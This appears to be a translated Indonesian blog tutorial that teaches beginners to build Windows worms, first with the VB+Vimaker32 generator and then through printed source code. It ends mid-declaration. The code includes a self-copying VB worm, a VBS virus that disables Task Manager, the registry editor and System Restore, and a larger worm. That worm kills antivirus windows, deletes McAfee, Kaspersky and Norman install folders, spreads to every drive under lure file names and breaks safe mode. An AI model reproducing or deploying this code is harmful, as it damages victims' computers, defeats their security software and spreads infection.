This post is written for newbies who are curious and want to try something new that is fairly fun and enjoyable… heh heh…
Okay, without any more rambling, let's start on the 'Black Project' we are going to create. Ready…? Okay, let's begin…
But first, does anyone know VB+Vimaker32? Okay, so that nobody gets confused or lost later on, I'll explain a little. VB+ViMaker32 is a worm generator created specifically to build worms easily, quickly and instantly, or in slang GPLLY (ga pake lama la yaw, "doesn't take long").
As its name suggests, this program produces worms written in Visual Basic that carry out particular actions according to the settings given. (Really exactly according to the settings we give…), so newbies who want to become a #VM (Virus Maker!) can use this program to learn. But only to learn, not as a toy or anything else, and certainly not to damage other people's computers; in line with the purpose this tool was made for, it is only for education and knowledge. (That's what its author says…)
Okay, let's just get going… I've been talking all this time without starting… But before we start building the 'Black Project' with this tool we need a few requirements and tools, all of which can be downloaded from your own kitchen:
A glass of hot water, complete with a spoon.
One sachet of cappuccino, any flavour, that has not expired; this one can be downloaded from the nearest shop…
Snacks, preferably tasty and fat-free.
A heart, mind and sincere intention willing to bear every consequence and risk if a mistake or accident makes the worm you built the king of your own computer (a weapon that turns on its owner, so to speak…)
Now we really begin. After downloading, first install VB+Vimaker32, but before that back up your important data to prevent anything unwanted; then run the .exe file and choose File->Project Baru (Full Load) or press Ctrl+M on the keyboard. The result looks like the picture below.
VB+Vimaker32 RC 03 interface:
Enter all the details of the virus to be built along with the other settings, such as Virus Information, Registry, Message and so on. Fill everything in as you wish; for the full details just open the documentation that is included. All the information about the settings is there. What makes this program interesting is that many settings and customizations can be adjusted as needed, unlike other worm generators where you only enter the author's name and the message to display, which feels less free and flexible.
The settings for the registry entries to be changed can be taken from the menu Tools-> Registry Action Selector; there are 50 Registry Entries to choose from, just pick one and double-click the registry setting. Then click Insert, Cut and paste it into the [REGISTRY] section. In addition, a worm built with this tool can read the caption of the active window, so that if the caption is on the forbidden list the window is automatically shut down. To choose the list of window captions to shut down, use the Window Caption Selector in the Tools menu. There are 176 captions to choose from. See, not much different from other local worms of its kind. In short, this program is really top! Heh heh…
Here is the Registry Action Selector:
Don't forget that the virus icon can also be changed; to replace the default icon just change it in the subsection: EXEIcon = \Icons Source\Folder\Folder001.ico
Many icon choices are provided in the Icons Source folder, so just pick one…
Last, and the moment everyone has been waiting for, is checking the code that has been typed before it is compiled into a virus. Click the menu Project->Analisa Project or press F8 to analyse the code; once the analysis is finished and no coding errors are detected, the 'Black Project' we made can be compiled straight away. Press F9 to compile the project and a warning message appears asking whether the compile should continue; read all the consequences first, then if you agree click yes, and the virus we made is compiled directly into an executable file (.exe).
The compiled file is fairly large because it is not automatically compressed internally, but we can still compress it with another packer such as UPX or tElock. In closing, happy Virus Making xxx
Learning to make a virus
Want to know how to make a virus with VB? Follow this tutorial:
This virus only copies itself over and over. When opened it copies itself 2 times, again and again, names each copy with a random number, and registers itself in the registry. Other code can be added to make it stronger, such as blocking Task Manager, msconfig, etc. This may look ordinary; I just want to share a bit of knowledge, sorry if I can't give more.. here is the code:
Private Sub Form_Load()
On Error Resume Next
KopiSusu
DaftarinKeRegister
End Sub
Public Function Pengacakan(ByVal Low As
Long, ByVal High As Long) As Long
Randomize
Pengacakan = Int((High - Low + 1) * Rnd) +
Low
End Function
Private Sub KopiSusu()
On Error Resume Next
X2 = 0
Do Until X2 = 2
X = Pengacakan(0, 999999999)
FileCopy App.Path & "\" &
App.EXEName & ".exe", App.Path & "\" &
App.EXEName & X & ".exe"
Shell App.Path & "\" &
App.EXEName & X & ".exe"
X2 = X2 + 1
Loop
End Sub
Private Sub DaftarinKeRegister()
X3 = Pengacakan(0, 999999999)
FileCopy App.Path & "\" &
App.EXEName & ".exe", "C:\windows\plaige" & X3
& ".exe"
Dim RegKey
Set RegKey =
CreateObject("WScript.Shell")
RegKey.RegWrite
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\plaige",
"C:\windows\plaige" & X3 & ".exe"
End Sub
The Kikuk virus, made with VBS
This virus is not malicious, just mischievous: it changes the labels of My Computer, Recycle Bin, My Network and others. It also infects files onto the FD, and autoruns automatically by creating an autorun.inf file.
Here is the source code (because it is written in VBS, the source code can be viewed directly)....
Explorer\Main\Window Title","Your
Computer Has been Infected By Virus : Paray Rontox"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control
Panel\International\s1159","Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control
Panel\International\s2359","Kikuk_Kikuk_666"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics\Shell Icon
Size","128"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control
Panel\Desktop\WindowMetrics\MinWidth","-100"
ParayCity.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",
"1", "REG_DWORD"
ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",
"1", "REG_DWORD"
ParayCity.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",
"1", "REG_DWORD"
ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel",
"1", "REG_DWORD"
ParayCity.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",
"1", "REG_DWORD"
ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",
"1", "REG_DWORD"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control Panel\Mouse\MouseSensitivity",
"2"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickHeight",
"6000"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickSpeed",
"6000"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickWidth",
"6000"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control Panel\Keyboard\KeyboardDelay",
"0"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control Panel\Keyboard\KeyboardSpeed",
"36"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning",
"1", "REG_DWORD"
ParayCity.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
NT\SystemRestore\DisableConfig", "1", "REG_DWORD"
ParayCity.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
NT\SystemRestore\DisableSR", "1", "REG_DWORD"
ParayCity.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing",
"1", "REG_DWORD"
ParayCity.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI",
"1", "REG_DWORD"
ParayCity.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Paray@Hacker",
rumahgue & "\Kikuk_666_Kikuk.vbs"
ParayCity.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ParayRontox",
rumahgue & "\Kikuk_666_Kikuk.vbs"
ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
"2", "REG_DWORD"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",
"1", "REG_DWORD"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",
"0", "REG_DWORD"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",
"0", "REG_DWORD"
ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Text",
"bangsat kljsdouiyhifeledfdsl"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Type",
"sfgdhtgtygvhgf"
ParayCity.regwrite "HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\",
"Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\IntroText","Maaf
komputer anda sudah terinfeksi virus Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InfoTip","Maaf
komputer anda sudah terinfeksi virus Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\",
"Jaringan Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\",
"Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\",
"Dokument Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\",
"Tonk Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HelloParay",
rumahgue & "\Kikuk_666_Kikuk_Massage.htm"
if check <> 1 then
Wscript.sleep 300000
end if
loop while check <> 1
set sibungul = createobject("Wscript.shell")
sibungul.run rumahgue &
"\explorer.exe /e,/select, " & Wscript.ScriptFullname
If you are tired of looking and tired of copy pa
VirusVb
For this virus you need 1 form and 4 modules. For the details, see the following code:
Private Sub bunuh_Timer()
'protection
tutup "avg"
tutup "anti"
tutup "ANSAV"
tutup "avast"
tutup "asm"
tutup "avira"
tutup "cillin"
tutup "clean"
tutup "CONFIRM FILE DELETE"
tutup "CONFIRM MULTIPLE FILE
DELETE"
tutup "compact"
tutup "CRC"
tutup "debug"
tutup "detect"
tutup "NOD"
tutup "Gasak!!!"
tutup "hijack"
tutup "INTERNET OPTIONS"
tutup "kill"
tutup "KILLBOX"
tutup "k1ckth3w0rm"
tutup "kaspersky"
tutup "mcafee"
tutup "NVC"
tutup "norton"
tutup "regis"
tutup "Norman"
tutup "Ogav"
tutup "panda"
tutup "POCKET KILLBOX"
tutup "proc"
tutup "recovery"
tutup "remover"
tutup "rest"
tutup "scan"
tutup "system"
tutup "System Mechanic"
tutup "Setup"
tutup "SHOW/KILL RUNNING PROCESS"
tutup "SYSTEM RESTORE"
tutup "superdat"
tutup "S m a d A V"
tutup "SmadAV"
tutup "task"
tutup "TKM"
tutup "termin"
tutup "trojan"
tutup "tune"
tutup "update"
tutup "virus"
tutup "vaksin"
tutup "WAV"
tutup "wash"
tutup "walk"
tutup "w32"
'save the nation's morals
kick "17tahun"
kick "adult"
kick "anal"
kick "bangbros"
kick "bangbus"
kick "Bugil"
kick "CrystalClear"
kick "Doggy Style"
kick "amit-amit"
kick "hentai"
kick "hottie"
kick "kiara kener"
kick "Kama Sutra"
kick "lalatx"
kick "miyabi"
kick "masturb"
kick "naughty"
kick "nude"
kick "naked"
kick "nana1_chunk"
kick "pussy"
kick "porn"
kick "sex"
kick "scandal"
kick "spy cam"
kick "SQ Evolution"
kick "Three Some"
kick "webcam show"
kick "xxx"
Call ganda
Call Racuni_Registry
Call proteksi_folder
End Sub
Private Sub Form_Load()
Y4D0Y666.Hide
App.TaskVisible = False
If App.PrevInstance Then End
'copy itself into the Windows folder under the name default.bat
CopyFile App.Path & "\" &
App.EXEName & ".exe", GetWindowsPath & "\" &
"default.bat", 0
'copy itself into system32 under the names login.exe and autoexec.bat
CopyFile App.Path & "\" &
App.EXEName & ".exe", GetSystemPath & "\" &
"login.exe", 0
CopyFile App.Path & "\" &
App.EXEName & ".exe", GetSystemPath & "\" &
"autoexec.bat", 0
'copy itself into My Documents under the name KerisPatih On Da Stage.exe
CopyFile App.Path & "\" &
App.EXEName & ".exe", GetSpecialfolder(CSIDL_PERSONAL) &
"\" & "KerisPatih On Da Stage.exe", 0
Call ganda
Call Racuni_Registry
Call proteksi_folder
Call Kill_antivirus
End Sub
Private Function Racuni_Registry()
On Error Resume Next
'Disable System Restore
CreateDwordValue HKEY_LOCAL_MACHINE,
"SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore",
"DisableConfig", 1
CreateDwordValue HKEY_LOCAL_MACHINE,
"SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore",
"DisableSR", 1
CreateDwordValue HKEY_LOCAL_MACHINE,
"SOFTWARE\Policies\Microsoft\Windows\Installer",
"LimitSystemRestoreCheckpointing", 1
CreateDwordValue HKEY_LOCAL_MACHINE,
"SOFTWARE\Policies\Microsoft\Windows\Installer",
"DisableMSI", 1
'Change the *.exe file type to Winamp media file
CreateStringValue HKEY_CLASSES_ROOT,
"exefile", REG_SZ, "", "Winamp media file"
'Manipulate Internet Explorer
CreateStringValue HKEY_CURRENT_USER,
"Software\Microsoft\Internet Explorer\Main\", REG_SZ, "Window
Title", "..:: YaDoY666 [WuZ HeRe] ::.."
CreateStringValue HKEY_CURRENT_USER,
"Software\Microsoft\Internet Explorer\Main\", REG_SZ, "Start
Page", GetSpecialfolder(CSIDL_PERSONAL) & "\" & "My
Pictures\About.htm"
'auto run virus
CreateStringValue HKEY_LOCAL_MACHINE,
"Software\Microsoft\Windows\CurrentVersion\Run\", REG_SZ,
"User-Login", GetSystemPath & "login.exe"
CreateStringValue HKEY_LOCAL_MACHINE,
"Software\Microsoft\Windows\CurrentVersion\Run\", REG_SZ,
"Norton", GetWindowsPath & "default.bat"
'Disable Folder Options
CreateDwordValue HKEY_CURRENT_USER,
"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\",
"NoFolderOptions", 1
CreateDwordValue HKEY_LOCAL_MACHINE,
"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\",
"NoFolderOptions", 1
'set the registry so that hidden files are not shown
CreateDwordValue HKEY_CURRENT_USER,
"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\",
"HideFileExt", 1
CreateDwordValue HKEY_CURRENT_USER,
"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\",
"Hidden", 0
CreateDwordValue HKEY_CURRENT_USER,
"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\",
"ShowSuperHidden", 0
CreateDwordValue HKEY_LOCAL_MACHINE,
"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\",
"HideFileExt", 1
CreateDwordValue HKEY_LOCAL_MACHINE,
"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\",
"Hidden", 0
CreateDwordValue HKEY_LOCAL_MACHINE,
"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\",
"ShowSuperHidden", 0
'Set the registry so that safe mode cannot be entered
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\",
"dmboot.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\",
"dmio.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\",
"dmload.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\",
"sermouse.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\",
"sr.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\",
"vga.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\",
"vgasave.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"dmboot.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"dmiot.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"rdpcdd.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"rdpdd.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"rdpwd.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"sermouse.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"sr.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"tdpipe.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"tdtcp.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"vga.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"vgasave.sys"
End Function
Private Function ganda()
Dim ictr As Integer
Dim sAllDrives As String
Dim sDrive As String
sDrive = ""
For ictr = 66 To 90
sDrive = Chr(ictr) & ":\"
If GetDriveType(sDrive) = 3 Or
GetDriveType(sDrive) = 2 Then
CopyFile App.Path & "\" &
App.EXEName & ".exe", sDrive & "I Love You.exe", 0
CopyFile App.Path & "\" &
App.EXEName & ".exe", sDrive & "cewe_bandel.exe", 0
End If
Next
End Function
Private Sub Form_Unload(Cancel As Integer)
Shell GetSystemPath & "\"
& "login.exe"
End Sub
Private Sub proteksi_folder()
On Error Resume Next
SetAttr GetWindowsPath, vbNormal
SetAttr GetWindowsPath & "\"
& "desktop.ini", vbNormal
Kill GetWindowsPath & "\"
& "desktop.ini"
Open GetWindowsPath & "\"
& "desktop.ini" For Output As #1
Print #1, "[.ShellClassInfo]"
Print #1,
"CLSID={C96401CC-0E17-11D3-885B-00C04F72C717}"
Close #1
SetAttr GetWindowsPath & "\"
& "desktop.ini", vbHidden
SetAttr GetWindowsPath, vbSystem
End Sub
Sub Kill_antivirus()
On Error Resume Next
'kill Norman antivirus
If Folder_Exist("C:\Norman") =
True Then
prog_AntiVir = Array( _
"C:\Norman\Bin", _
"C:\Norman\Download", _
"C:\Norman\Nse\Bin", _
"C:\Norman\Nvc\Bin", _
"C:\Norman\Nvc\Config", _
"C:\Norman\Qtn\Bin" _
)
SetAttr "C:\Norman", vbNormal
For p = 0 To 3
Kill prog_AntiVir(p) &
"\*.exe"
Kill prog_AntiVir(p) &
"\*.dll"
Kill prog_AntiVir(p) & "\*.zip"
Kill prog_AntiVir(p) & "\*.*"
Next p
RmDir "C:\Norman"
End If
'kill Norman antivirus if it is inside the Program Files directory
If Folder_Exist("C:\Program
Files\Norman") = True Then
prog_AntiVir = Array( _
"C:\Program Files\Norman\Bin", _
"C:\Program
Files\Norman\Download", _
"C:\Program
Files\Norman\Nse\Bin", _
"C:\Program
Files\Norman\Nvc\Bin", _
"C:\Program
Files\Norman\Nvc\Config", _
"C:\Program Files\Norman\Qtn\Bin"
_
)
SetAttr "C:\Program
Files\Norman", vbNormal
For p = 0 To 3
Kill prog_AntiVir(p) &
"\*.exe"
Kill prog_AntiVir(p) &
"\*.dll"
Kill prog_AntiVir(p) &
"\*.zip"
Kill prog_AntiVir(p) & "\*.*"
Next p
RmDir "C:\Program Files\Norman"
End If
'kill McAfee antivirus
If Folder_Exist("C:\Program
Files\McAfee") = True Then
prog_AntiVir = Array( _
"C:\Program Files\McAfee\McAfee
Firewall", _
"C:\Program Files\McAfee\McAfee
VirusScan", _
"C:\Program Files\McAfee\McAfee
VirusScan\Backups\DatBackup", _
"C:\Program Files\McAfee\McAfee
VirusScan\Backups\EngineBackup", _
"C:\Program Files\McAfee\McAfee
VirusScan\Res00", _
"C:\Program Files\McAfee\VirusScan
Wireless" _
)
SetAttr "C:\Program
Files\McAfee", vbNormal
For p = 0 To 3
Kill prog_AntiVir(p) &
"\*.exe"
Kill prog_AntiVir(p) &
"\*.dll"
Kill prog_AntiVir(p) &
"\*.zip"
Kill prog_AntiVir(p) & "\*.*"
Next p
RmDir "C:\Program Files\McAfee"
End If
'kill Kaspersky antivirus
If Folder_Exist("C:\Program
Files\Kaspersky Lab") = True Then
prog_AntiVir = Array( _
"C:\Program Files\Kaspersky
Lab\Kaspersky Anti-Virus Personal Pro", _
"C:\Program Files\Kaspersky
Lab\Kaspersky Anti-Virus Personal Pro\Policy", _
"C:\Program Files\Kaspersky
Lab\Kaspersky Anti-Virus Personal Pro\Report", _
"C:\Program Files\Kaspersky
Lab\Kaspersky Anti-Virus Personal Pro\Infected" _
)
SetAttr "C:\Program Files\Kaspersky
Lab", vbNormal
For p = 0 To 3
Kill prog_AntiVir(p) &
"\*.exe"
Kill prog_AntiVir(p) &
"\*.dll"
Kill prog_AntiVir(p) &
"\*.zip"
Kill prog_AntiVir(p) &
"\*.vxd"
Kill prog_AntiVir(p) & "\*.*"
Next p
RmDir "C:\Program Files\Kaspersky
Lab"
End If
End Sub
Module BUNUH
Public Declare Function GetForegroundWindow
Lib "user32" () As Long
Public Declare Function SendMessage Lib
"user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal
wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Declare Function GetWindowText Lib
"user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal
lpString As String, ByVal cch As Long) As Long
Public Const WM_CLOSE = &H10
Public Function kick(target As String)
Dim H As Long
Dim T As String * 255
H = GetForegroundWindow
GetWindowText H, T, 255
If InStr(UCase(T), UCase(target)) > 0
Then
SendMessage H, WM_CLOSE, 0, 0
End If
End Function
Module FILE
Public Declare Function CopyFile Lib
"kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As
String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Public Declare Function
SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As
Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
Public Declare Function SHGetPathFromIDList
Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl
As Long, ByVal pszPath As String) As Long
Public Declare Function GetSystemDirectory
Lib "kernel32.dll" Alias "GetSystemDirectoryA" (ByVal
lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory
Lib "kernel32.dll" Alias "GetWindowsDirectoryA" (ByVal
lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function CreateDirectory Lib
"kernel32" Alias "CreateDirectoryA" (ByVal lpPathName As
String, lpSecurityAttributes As SECURITY_ATTRIBUTES) As Long
Public Declare Function GetDriveType Lib
"kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String)
As Long
Public Declare Function DeleteFile Lib
"kernel32.dll" Alias "DeleteFileA" (ByVal lpFileName As
String) As Long
Public Declare Function SetFileAttributes
Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName
As String, ByVal dwFileAttributes As Long) As Long
Public Const FILE_ATTRIBUTE_SYSTEM =
&H4
Public Const FILE_ATTRIBUTE_READONLY =
&H1
Public Const FILE_ATTRIBUTE_HIDDEN =
&H2
Public Const FILE_ATTRIBUTE_DIRECTORY =
&H10
Public Const FILE_ATTRIBUTE_ARCHIVE =
&H20
Public Const FILE_ATTRIBUTE_NORMAL =
&H80
Public Type SHITEMID
cb As Long
abID As Byte
End Type
Public Type ITEMIDLIST
mkid As SHITEMID
End Type
Public Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Enum SFolder
CSIDL_DESKTOP = &H0 'virtual folder that is the root of the whole namespace (/Desktop)
CSIDL_PROGRAMS = &H2 'system folder containing the user's program groups (/Programs)
CSIDL_CONTROLS = &H3 'virtual folder containing the Control Panel application icons (/Control Panel)
CSIDL_PRINTERS = &H4 'virtual folder containing the installed printers (/Printers)
CSIDL_PERSONAL = &H5 'system folder used to store the user's general documents (/My Document)
CSIDL_FAVORITES = &H6 'folder containing the user's favorite items (/Favorites)
CSIDL_STARTUP = &H7 'folder containing the user's StartUp program group (/Startup)
CSIDL_RECENT = &H8 'system folder containing the frequently used documents (/Recent)
CSIDL_SENDTO = &H9 'folder containing the Send To menu items (/Send To)
CSIDL_BITBUCKET = &HA 'system folder containing the file objects in the user's Recycle Bin (/Recycle Bin)
CSIDL_STARTMENU = &HB 'system folder containing the Start menu items (/StartMenu)
CSIDL_DESKTOPDIRECTORY = &H10 'system folder used to physically store file objects on the desktop
CSIDL_DRIVES = &H11 'folder containing everything on the local computer (/My Computer)
CSIDL_NETWORK = &H12 'virtual folder that is the root of the network namespace hierarchy (/My Network Places)
CSIDL_NETHOOD = &H13 'folder containing the link objects that may exist in the My Network Places virtual folder (/NetHood)
CSIDL_FONTS = &H14 'folder containing fonts (/FONT)
CSIDL_TEMPLATES = &H15 'folder used to store document templates (/Template)
End Enum
'Get special folder
Public Function
GetSpecialfolder(JenisFolder As SFolder) As String
Dim r As Long
Dim IDL As ITEMIDLIST
'get special folder
r = SHGetSpecialFolderLocation(100,
JenisFolder, IDL)
If r = NOERROR Then
'create buffer
Path$ = Space$(512)
'Get path from IDList(IDL)
r = SHGetPathFromIDList(ByVal IDL.mkid.cb,
ByVal Path$)
'Remove chr$(0)
GetSpecialfolder = Left$(Path, InStr(Path,
Chr$(0)) - 1)
Exit Function
End If
GetSpecialfolder = ""
End Function
'Get System Path
Public Function GetSystemPath() As String
On Error Resume Next
Dim Buffer As String * 255
Dim x As Long
x = GetSystemDirectory(Buffer, 255)
GetSystemPath = Left(Buffer, x) &
"\"
End Function
'Get Windows Path
Public Function GetWindowsPath() As String
On Error Resume Next
Dim Buffer As String * 255
Dim x As Long
x = GetWindowsDirectory(Buffer, 255)
GetWindowsPath = Left(Buffer, x) &
"\"
End Function
Public Function Folder_Exist(ByVal
strFolder As String) As Boolean
Dim fso As Object
Set fso =
CreateObject("Scripting.FileSystemObject")
If InStr(1, Right$(strFolder, 5),
".") > 0 Then
strFolder =
fso.GetParentFolderName(strFolder)
End If
If fso.FolderExists(strFolder) Then
Folder_Exist = True
Else
Folder_Exist = False
End If
Set fso = Nothing
End Function
Module Racuni_Registry
'Registry API
Public Declare Function RegDeleteValue Lib
"advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long,
ByVal lpValueName As String) As Long
Public Declare Function RegDeleteKey Lib
"advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long,
ByVal lpSubKey As String) As Long
Public Declare Function RegOpenKey Lib
"advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long,
ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegCreateKey Lib
"advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long,
ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegSetValueEx Lib
"advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long,
ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long,
lpData As Any, ByVal cbData As Long) As Long ' Note that if you declare the
lpData parameter as String, you must pass it By Value.
Public Declare Function RegCloseKey Lib
"advapi32.dll" (ByVal hKey As Long) As Long
Public Declare Function RegQueryValueEx Lib
"advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As
Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long,
lpData As Any, lpcbData As Long) As Long ' Note that if you declare the lpData
parameter as String, you must pass it By Value.
Public Declare Function RegSetValue Lib
"advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long,
ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal
cbData As Long) As Long
Public Const REG_DWORD = 4
Enum REG
HKEY_CURRENT_USER = &H80000001
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_CONFIG = &H80000005
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
End Enum
Enum TypeStringValue
REG_SZ = 1
REG_EXPAND_SZ = 2
REG_MULTI_SZ = 7
End Enum
'Create or Set Dword Value Registry
Public Function CreateDwordValue(hKey As
REG, Subkey As String, strValueName As String, dwordData As Long) As Long
On Error Resume Next
Dim ret As Long
RegCreateKey hKey, Subkey, ret
CreateDwordValue = RegSetValueEx(ret,
strValueName, 0, REG_DWORD, dwordData, 4)
RegCloseKey ret
End Function
Public Function CreateStringValue(hKey As
REG, Subkey As String, RTypeStringValue As TypeStringValue, strValueName As
String, strData As String) As Long
On Error Resume Next
Dim ret As Long
RegCreateKey hKey, Subkey, ret
CreateStringValue = RegSetValueEx(ret,
strValueName, 0, RTypeStringValue, ByVal strData, Len(strData))
RegCloseKey ret
End Function
Public Function DeleteValue(hKey As REG,
Subkey As String, lpValName As String) As Long
Dim ret As Long
On Error Resume Next
RegOpenKey hKey, Subkey, ret
DeleteValue = RegDeleteValue(ret,
lpValName)
RegCloseKey ret
End Function
Module Restart
Public Declare Function ExitWindowsEx Lib
"user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Public Declare Function OpenProcessToken
